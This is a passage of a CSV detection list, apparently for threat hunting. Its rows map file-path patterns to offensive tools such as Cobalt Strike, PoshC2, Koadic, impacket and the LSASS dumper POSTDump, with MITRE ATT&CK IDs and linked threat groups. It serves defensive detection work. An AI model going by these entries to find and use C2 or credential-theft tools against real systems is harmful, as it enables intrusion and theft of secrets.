generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 
tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/phishing/password_box*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/PhishingServer/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/pid:1337 */dll:*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10",,"N/A",,, +"*/ping6.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/PipeViewer.exe*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*/PipeViewer.git*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*/PipeViewer.sln*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - 
TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*/PipeViewer/Program.cs*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" +"*/pitty_tiger.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/pivotnacci.git*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - 
T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*/pivotnaccilib*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" +"*/pjl-info-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" +"*/pjl-ready-message.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pkg/state/sudoers.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/PKINITtools*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*/Plazmaz/LNKUp*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/PoC/PrivilegeEscalation*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*/POC_DLL.vcxproj*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" +"*/PoC-CVE-2023-21554*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A",,"N/A",,, 
+"*/poisoners/*.py","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/polenum.py*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"*/pop3-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pop3-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pop3-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/popCalc.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. 
and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/PortBender/*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" +"*/portscan.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/portscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation 
Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/port-states.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/POSeidon.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/posh.key*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - 
T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/posh.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*/PoshC2*","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/poshc2-*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*/PoshC2/*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*/posh-config*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/posh-log*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/posh-project*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/posh-server*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/posh-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/posh-stop-service*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/posh-update*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*/post_exploitation*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/PostDump.exe*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z"
+"*/POSTDump.git*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","1","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z"
+"*/postLegit/grkg*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
